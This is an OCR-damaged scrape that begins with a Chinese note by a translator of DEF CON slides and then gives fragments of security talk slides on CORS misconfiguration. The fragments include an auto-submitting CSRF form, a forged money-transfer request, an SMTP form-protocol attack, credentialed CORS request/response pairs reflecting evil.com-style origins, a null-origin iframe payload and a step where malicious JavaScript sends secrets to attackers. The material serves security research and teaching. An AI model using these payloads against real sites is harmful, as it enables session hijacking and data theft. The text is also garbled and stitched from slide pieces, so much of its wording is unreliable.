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段 老 师 ， 我 翻译 完 今天 上 午 
defcon 要 用 的 slides 后 很 兴奋 ， 特 
别 有 感 触 ， 非 常 感谢 您 给 我 的 机 
会 ， 能 够 参与 到 这 样 有 趣 的 活动 
0 因为 刚 结束 的 一 天 里 收获 很 
多 ; 与 国外 的 speaker 接 触 后 ， 突 
然 发 现 他 们 做 这 些 事情 ， 真 的 有 
是 纯粹 出 于 兴趣 因为 热爱 ; 我 
的 第 一 个 speaker，Zoz，MIT 毕 
业 的 CS Phd， 从 defcon16 到 24 
连续 做 了 9 届 speaker， 和 恶作剧 爱 
好 者 ， 每 次 脑 洞 大 开 很 有 意思 ， 
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diss. MURS 技术 没有 
边界 ， 能 够 跟 不 同 语言 、 国 家 、 
肤色 的 人 交流 同样 的 技术 ， 让 我 
发 觉 communication 也 可 以 很 有 
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<html> 
<body> 
«form method="post” action=“http://b.com/b.php”» 
<input type="text” name="x” value=“data”> 
<input type=“submit” value=“submit” /> 
</form> 


<script type=“text/javascript” > 
window.onload = function() { 
document.forms[0].submit(); 


} 
</script> 
</body> 
</html> 


Document of a.com 


Cross site reguest 
forgery(CSRF 


Attacker site [pank site 
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3. send cross site 


POST /transfer-money?to- Bttacker-account HTTP 
Host: bank.com 


Cookie: session-id=victim-tookie 
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HTML form protocol 
attack(HFPA) 


Victim : Mtacker site == SMTP serve 


HELO example.com 3. ignore unknow cmds 


MAIL FROM:<somebodyoexample.cparFform SMTP cmds 
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var xhr=new XMLHttpRequest(); 
xhr.open(" PATCH", "http://b.com/r", true); 
xhr.setReguestHeader(“X-Reguested-With”, 
“XMLHttpReauest "); 

xhr.withCredentials — true; 


xhr.send(“some data”); 
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e Content-Type (0000000000000 “text/plain”, 
"multipart/form-data", and "application/x- 
form-uri-encoded 
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To: whucjj@icloud.com 


Hello Jianjun, 

Thank you for letting us Know about your plans to present at DEF CON China. Your current 
timeline does not provide sufficient time to prepare security updates for our customers before 
your presentation. 


To avoid N our r customers at risk, are you able to refrain from presenting SS 
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Inject iframes to any HTTP site 
Hajiack http://example.com and inject malicious JS 
Malicious JS sends CORS request to HTTPS sites 
Origin: http://example.com 
Server returns CORS polic 
Access-Control-Allow-Origin: http://example.com 
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Malicious JS sends secrets to attackers 
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* James Kettle, “Exploiting CORS misconfigurations for 
Bitcoins and bounties”, AppSecUSA 2016 


* Evan Johnson, “Misconfigured CORS and why web appsec 
is not getting easier”, AppSecUSA 2016 
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HTTP/1.1 200 OK 
Access-Control-Allow-Credentials: true 


images. baidu.com 'Access-Control-Allow-Origin: 
https://m.baidu.com,https://www.baidu.com, 
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Origin: http://evil.com 


HTTP/1.1 200 OK 
Access-Control-Allow-Origin: http://evil.com 
Access-Control-Allow-Credentials: true 
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add header "Access-Control-Allow-Origin" 
G et Lo OO] 
Host: www.example.com 
Origin: http://example.com.evil.com 


HTTP/1.1 200 OK 
Access-Control-Allow-Origin: http:// example.com.evil.com 
Access-Control-Allow-Credentials: true 
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if (reqOrigin.endswith(“example.com”) ) 1 
respHeaders[ “Access-Control-Allow-Origin”] = 
regOrigin 


GET /api HTTP/1.1 
Host: www.example.com 
Origin: http://attackexample.com 


HTTP/1.1 200 OK 
Access-Control-Allow-Origin: http://attackexample.com 
Access-Control-Allow-Credentials: true 
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Access-Control-Allow-Origin — single origin, null 
or * 


Whenever a user agent issues an HTTP request from a 


"privacy- sensitive" context, the user agent MUST send the 
value "null" in the Origin header field. 
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<iframe sandbox="allow-scripts allow-top-navigation 
allow-forms" 


src—'data:text/html, «script» XMLHttpRequest 
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Cache-Control: private, no-store, no-cach Hacking Facebook Messenger 


Pragma: no-cache - 
Uin WR to Read Private Chats 
Content-Type: application/json 
Date: Thu, 1 Dec 201€ 00: 2 T 一 一 一 - = — 
Access-Control-Allow-Origin: e https://www.bugsec.com/facebook chat log viewer.php 
Access-Control-Allow-Credentials: true 


Connection: close 
Content-Length: 494 hijacked chat 


for (55); (*e”: "msg", “seq”: 29, "u":100013311:51575610 Hello 
this is the private facebook 
chat.","irisSeqId":"126", messageHetadata 13386760704 I want to tell you a secret, will you be the only one reading this? 
ingId":"6209892158980274315", "tags": [ "sou 


),"class":"NevMessage"),"type":"delta"," 


) https://www.bugsec.com/ X \ 4 Susan Alacchfgfjbjd Sada: X 


i: 
13321275610 Don't worry. this is the private facebook chat. 


https://www.cynet.com/wp-content/uploads/2016/12/Blog-Post-BugSec- 
Cynet-Facebook-Originull.pdf 
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ASP.net CORS ASP.net Yes 
Corsslim PHP 
Django-cors-headers Python Yes 
Flask-cors Python Yes 
Go-cors Golang Yes 
Laravel-cors PHP Yes 
NelmioCorsBundle PHP 
Plack::Middleware::CrossO Perl Yes 
rigin 

Rack-cors Puby 

Tomcat CORS filter Java Yes 


Yii2 CORS filter PHP Yes 
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heck Fail 
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GET /api HTTP/1.1 
Host: www.example.com 
Origin: null 


HTTP/1.1 200 OK 
Access-Control-Allow-Origin: null 
Access-Control-Allow-Credentials: true 
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eExtract 97,199,966 subdomains from 
PassiveDNS 


eFrom Qihoo 360 network security lab 
* Method: 


* Activel probing CORS configurations 
GET /api HTT /1.1 
Host: www.example.com 


Origin: http://RAND.example.com 


HTTP/1.1 200 OK 


Access-Control-Allow-Origin: http://RAND.example.com 
Access-Control-Allow-Credentials: true 


Cross origin resource 
sharing(CORS) 


JSONP vulnerablity discovered 
CORS accepted as W3C recommendation 
US-CERT vulnerablility note on HFPA attacks 
JS and SOP introduced CORS shipped by IE, Chrome, Firefox, Safari 


1991 1994 1997 2000 2003 006 2009 2012 2015 2018 


HTML proposed JSONP proposed 
CORS included in WHATWG'Ss Fetch standard 
CSRF vulnerablity discovered W3C CORS proposed obsolete 


First CORS draft submitted 
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